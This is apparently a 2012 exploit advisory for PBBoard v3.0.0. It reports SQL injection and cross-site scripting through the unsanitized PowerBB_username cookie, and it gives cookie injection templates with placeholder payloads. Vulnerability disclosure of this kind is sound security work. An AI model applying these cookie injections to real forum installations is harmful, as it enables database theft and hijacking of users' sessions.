#################################################
### Exploit Title: PBBoard v3.0.0 Multiple Remote Vulnerabilities
### Date: 12/10/2012 
### Author: L0n3ly-H34rT 
### Contact: l0n3ly_h34rt@hotmail.com 
### My Site: http://se3c.blogspot.com/ 
### Vendor Link: http://www.pbboard.com/
### Software Link: http://www.pbboard.com/PBBoard_v3.0.0.zip
### Version: 3.0.0 ( may be old version is affect ! i don't check )
### Tested on: Linux/Windows 
#################################################

1- Remote SQL Injection :

In file ( engine/Engine.class.php ) on line 431 :

$username = $_COOKIE["PowerBB_username"];

# Inject the cookie by :

PowerBB_today_date=12%2F10%2F2012; PowerBB_username=[SQL]; PowerBB_style=1;

2- XSS :

In file ( engine/Engine.class.php ) on line 431 :

$username = $_COOKIE["PowerBB_username"];

# Inject the cookie by :

PowerBB_today_date=12%2F10%2F2012; PowerBB_username=[XSS]; PowerBB_style=1;


################################################

# Greetz to my friendz